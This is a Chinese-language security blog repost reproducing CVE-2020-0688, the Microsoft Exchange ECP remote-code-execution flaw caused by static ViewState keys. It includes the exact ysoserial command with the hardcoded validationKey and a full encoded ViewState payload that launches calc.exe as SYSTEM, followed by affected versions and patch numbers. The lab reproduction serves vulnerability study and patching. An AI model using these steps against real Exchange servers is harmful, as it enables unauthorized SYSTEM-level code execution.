ExchangeServer漏洞CVE-2020-0688复现

栏目: IT技术 · 发布时间: 4年前

内容简介:近期爆出Exchange邮件服务器远程执行命令漏洞,对其进行了分析并在本地进行了复现,其中也遇到了一些问题。漏洞产生的主要原因就是在Exchange ECP组件中发现,邮件服务在安装的过程中不会随机生成秘钥,也就是说所有默认安装的Exchange服务器中的validationKey和decryptionKey的值都是相同的,攻击者可以利用静态秘钥对服务器发起攻击,在服务器中以SYSTEM权限远程执行代码。目前github中已经有利用poc脚本:

近期爆出Exchange邮件服务器远程执行命令漏洞,对其进行了分析并在本地进行了复现,其中也遇到了一些问题。

漏洞原理

漏洞产生的主要原因就是在Exchange ECP组件中发现,邮件服务在安装的过程中不会随机生成秘钥,也就是说所有默认安装的Exchange服务器中的validationKey和decryptionKey的值都是相同的,攻击者可以利用静态秘钥对服务器发起攻击,在服务器中以SYSTEM权限远程执行代码。

漏洞利用工具

目前github中已经有利用poc脚本: POC1 , POC2 ,脚本的实现原理基本相同,其中都需要用到ysoserial.exe对payload进行反序列化。

复现过程

首先我在本地搭建的是Exchange Server2016,对于如何识别版本可以用如下的方式:

在登录界面查看网页源代码:

ExchangeServer漏洞CVE-2020-0688复现

找到<link rel=”shortcut icon” href=”/owa/auth/15.1.225/themes/resources/favicon.ico” type=”image/x-icon”>

其中15.1.225就是当前exchange的版本,之后在 Mircosoft网站 上根据版本号就可以直接查询:

ExchangeServer漏洞CVE-2020-0688复现

前面说到validationKey和decryptionKey的值都是相同,可以再安装好的服务中找到web.config文件查看:

ExchangeServer漏洞CVE-2020-0688复现

这样一来的话我们还需要找到另外两个值:generator和viewstateuserkey,可以通过一个普通账号登录 https://ip /ecp/default.aspx来寻找这两个值。

generator位于default.aspx–>Response–>__VIEWSTATEGENERATOR中,这个值也基本上是相同的:B97B4E27:

ExchangeServer漏洞CVE-2020-0688复现

viewstateuserkey位于default.aspx–>Headers–>ASP.NET_SessionId中:

ExchangeServer漏洞CVE-2020-0688复现

有了这几个值的话就可以构造payload了。利用ysoserial生成反序列化(–isdebug –islegacy可省略):

ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "cmd /c calc.exe" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="加上ASP.NET_SessionId的值" --isdebug –islegacy

ExchangeServer漏洞CVE-2020-0688复现

把生成的反序列化结果URL编码后访问:/ecp/default.aspx?__VIEWSTATEGENERATOR=<generator>&__VIEWSTATE=<ViewState>

https://ip/ecp/default.aspx?__VIEWSTATEGENERATOR=B97B4E27&__VIEWSTAT
E=%2FwEyhAYAAQAAAP%2F%2F%2F%2F8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVk
aXRvciwgVmVyc2lvbj0zLjAuM**wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYz
ODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuR**ybWF0dGluZy5UZXh0
R**ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVnc**1bmRCcnVzaAECAAAABgMAAACmBDxSZXNv
dXJjZURpY3Rpb25hcnkNCiAgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngv
MjAwNi94YW1sL3ByZXNlbnRhdGlvbiINCiAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljc**zb2Z0
LmNvbS93aW5meC8yMDA2L3hhbWwiDQogIHhtbG5zOlN5c3RlbT0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07
YXNzZW1ibHk9bXNjb3JsaWIiDQogIHhtbG5zOkRpYWc9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdu
b3N0aWNzO2Fzc2VtYmx5PXN5c3RlbSI%2BDQoJIDxPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9IiIgT2
JqZWN0VHlwZSA9ICJ7IHg6VHlwZSBEaWFnOlByb2Nlc3N9IiBNZXRob2ROYW1lID0gIlN0YXJ0IiA%2B
DQogICAgIDxPYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICAgICAgPFN5c3Rl
bTpTdHJpbmc%2BY2FsYy5leGU8L1N5c3RlbTpTdHJpbmc%2BDQogICAgIDwvT2JqZWN0RGF0YVByb3Zp
ZGVyLk1ldGhvZFBhcmFtZXRlcnM%2BDQogICAgPC9PYmplY3REYXRhUHJvdmlkZXI%2BDQo8L1Jlc291
cmNlRGljdGlvbmFyeT4LzN2Z9QtEAJ0ld64eNnVltj7dajY%3D

访问后服务器返回500,可以在服务器端查看执行结果:

ExchangeServer漏洞CVE-2020-0688复现

可以在管理器中看到以system权限开启的计算器

在执行 python 脚本时需要在python3环境下,原脚本中需要自己手动输入反序列化结果,建议在脚本中直接调用cmd执行反序列化操作。

影响版本

影响所有版本的Exchang Server:

Microsoft Exchange Server 2010 Service Pack 3
Microsoft Exchange Server 2013
Microsoft Exchange Server 2016
Microsoft Exchange Server 2019

防护措施

补丁下载

Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 30KB4536989

Microsoft Exchange Server 2013 Cumulative Update 23 KB4536988

Microsoft Exchange Server 2016 Cumulative Update 14 KB4536987

Microsoft Exchange Server 2016 Cumulative Update 15 KB4536987

Microsoft Exchange Server 2019 Cumulative Update 3 KB4536987

Microsoft Exchange Server 2019 Cumulative Update 4 KB4536987

*本文原创作者:Kriston,本文属于FreeBuf原创奖励计划,未经许可禁止转载


以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

硅谷之谜

硅谷之谜

吴军 / 人民邮电出版社 / 2015-12-1 / 59.00

这是一本颠覆人们对信息时代的认识、对创新和创业的理解的好书。作者吴军通过介绍硅谷成功的秘诀,揭示了信息时代的特点和方法论。 近年来,吴军从技术和管理人员变成了投资人,他对IT领域,尤其是对科技创新因而有了更深入的了解。他根据这些年在硅谷所获得的第一手资料,结合自己的思考,回答了长期以来令大家深感困惑的一个不解之谜,那就是—为什么硅谷在全世界其他地区难以复制? 《硅谷之谜》从某种意义上讲......一起来看看 《硅谷之谜》 这本书的介绍吧!

URL 编码/解码
URL 编码/解码

URL 编码/解码

Markdown 在线编辑器
Markdown 在线编辑器

Markdown 在线编辑器

HSV CMYK 转换工具
HSV CMYK 转换工具

HSV CMYK互换工具